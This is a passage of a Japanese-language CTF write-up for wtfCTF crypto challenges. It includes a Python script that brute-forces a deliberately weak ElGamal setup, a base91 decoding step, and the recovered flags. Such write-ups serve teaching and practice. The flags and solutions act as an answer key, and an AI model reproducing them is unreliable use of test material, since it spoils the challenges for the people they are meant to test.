実行結果は以下の通り。
[+] s = 3500760834200815824254912959978360560462778842148099201384671771825403517354174011533757009996439851598794283042533708449934245863525469711985409342348442867824703870828474794222597219644096639185101676609846821311426681114851095712195523998956581895736228820227678148680332925468816919947782412925162146012
[*] flag: wtfCTF{1nc0gn1t0_c4nt_st0p_v1ru5_dumb0!}
wtfCTF{1nc0gn1t0_c4nt_st0p_v1ru5_dumb0!}
Elgamal (Crypto)
ElGamal暗号だが、c1は出てこない。
priv_key = da b = pow(a, da, P) c1 = pow(a, r, P) 2 < r < (len(c2) + 2) c2 = (m * pow(b, r, P)) % P
まずflagがwから始まることから、rの値とa * daの約数のブルートフォースでaとdaを割り出す。あとはmとrの値のブルートフォースで、フラグを割り出す。
from sympy import * from Crypto.Util.number import * P = 2147483647 a_da = 335007430212 c2 = [782609095, 956334224, 948802740, 27994553, 1649557991, 1242339631, 2047940013, 1044206616, 758980367, 542738157, 1732201892, 196836220, 193577195, 649932019, 1925903078, 862766676] div = divisors(a_da) flag_head = 'w' found = False for d in div: a = d da = a_da // a b = pow(a, da, P) for r in range(2, len(c2) + 2): try_c2 = (ord(flag_head) * pow(b, r, P)) % P if try_c2 == c2[0]: found = True break if found: break print '[+] a =', a print '[+] da =', da b = pow(a, da, P) print '[+] b =', b flag = '' for i in range(len(c2)): found = False for code in range(32, 127): for r in range(2, len(c2) + 2): try_c2 = (code * pow(b, r, P)) % P if try_c2 == c2[i]: found = True flag += chr(code) break if found: break print '[+] flag =', flag print '[*] flag =', flag
実行結果は以下の通り。
[+] a = 2147483527
[+] da = 156
[+] b = 1989314125
[+] flag = w
[+] flag = wt
[+] flag = wtf
[+] flag = wtfC
[+] flag = wtfCT
[+] flag = wtfCTF
[+] flag = wtfCTF{
[+] flag = wtfCTF{3
[+] flag = wtfCTF{3l
[+] flag = wtfCTF{3l_
[+] flag = wtfCTF{3l_g
[+] flag = wtfCTF{3l_g4
[+] flag = wtfCTF{3l_g4m
[+] flag = wtfCTF{3l_g4m4
[+] flag = wtfCTF{3l_g4m4l
[+] flag = wtfCTF{3l_g4m4l}
[*] flag = wtfCTF{3l_g4m4l}
wtfCTF{3l_g4m4l}
F33db4cK (Crypto)
アンケートに答えたら、こう表示された。
Here's your flag : 05v<X7n#=O%/2m(S_RXxL(zvE2}1TmVjf5V<K}A
https://www.dcode.fr/base-91-encodingでbase91デコードする。
wtfCTF{Th4nK5_F0r_th3_fe3db4cK}
